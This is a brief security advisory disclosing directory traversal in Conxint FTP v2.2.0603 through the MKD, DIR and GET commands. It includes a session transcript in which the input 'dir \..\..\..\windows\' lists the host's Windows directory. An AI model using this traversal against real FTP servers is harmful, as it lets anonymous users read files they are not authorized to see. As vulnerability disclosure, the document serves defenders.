"Conxint FTP server provide FTP service on Windows 98/2000/2003/ME/XP operation system. You can use it as a general FTP site server, or share files with other users as a file server."
Conxint FTP v2.2.0603 and previous is vulnerable to Directory Transversals via the MKD and DIR as well as GET commands.
Credit:
The information has been provided by: Greg Linares.
Description:
Conxint FTP v2.2.0603 and previous is vulnerable to Directory Transversals via the MKD and DIR as well as GET commands.
This improperly shows file listings of the host computer outside of the FTP Root directory. As well as allows remote users or even Unathenticated Anonymous uers to grab any file on the webserver.
220 Conxint ftp server ready!
ftp> dir \..\..\..\windows\
200 PORT Command successful.
125 Opening ASCII mode data connection for /bin/ls.
total 0
-rw-rw-r-- 1 root root 0 Aug 09 10:45 .tmp
drw-rw-r-- 1 root root 512 Oct 13 00:35 $hf_mig$
drw-rw-r-- 1 root root 512 Jun 24 03:02
$MSI31Uninstall_KB893803v2$
drw-rw-r-- 1 root root 512 Jun 25 03:17 $NtUninstallKB873339$
drw-rw-r-- 1 root root 512 Jun 25 03:22 $NtUninstallKB885835$
drw-rw-r-- 1 root root 512 Jun 25 03:21 $NtUninstallKB885836$
drw-rw-r-- 1 root root 512 Jun 25 03:09 $NtUninstallKB885884$
drw-rw-r-- 1 root root 512 Jun 25 03:09 $NtUninstallKB886185$
drw-rw-r-- 1 root root 512 Jun 25 03:16 $NtUninstallKB887742$
drw-rw-r-- 1 root root 512 Jun 25 03:16 $NtUninstallKB888113$
drw-rw-r-- 1 root root 512 Jun 25 03:10 $NtUninstallKB888302$
drw-rw-r-- 1 root root 512 Jun 25 03:12 $NtUninstallKB890046$
drw-rw-r-- 1 root root 512 Jun 25 03:01 $NtUninstallKB890859$
drw-rw-r-- 1 root root 512 Jun 25 03:14 $NtUninstallKB891781$
...... ETC
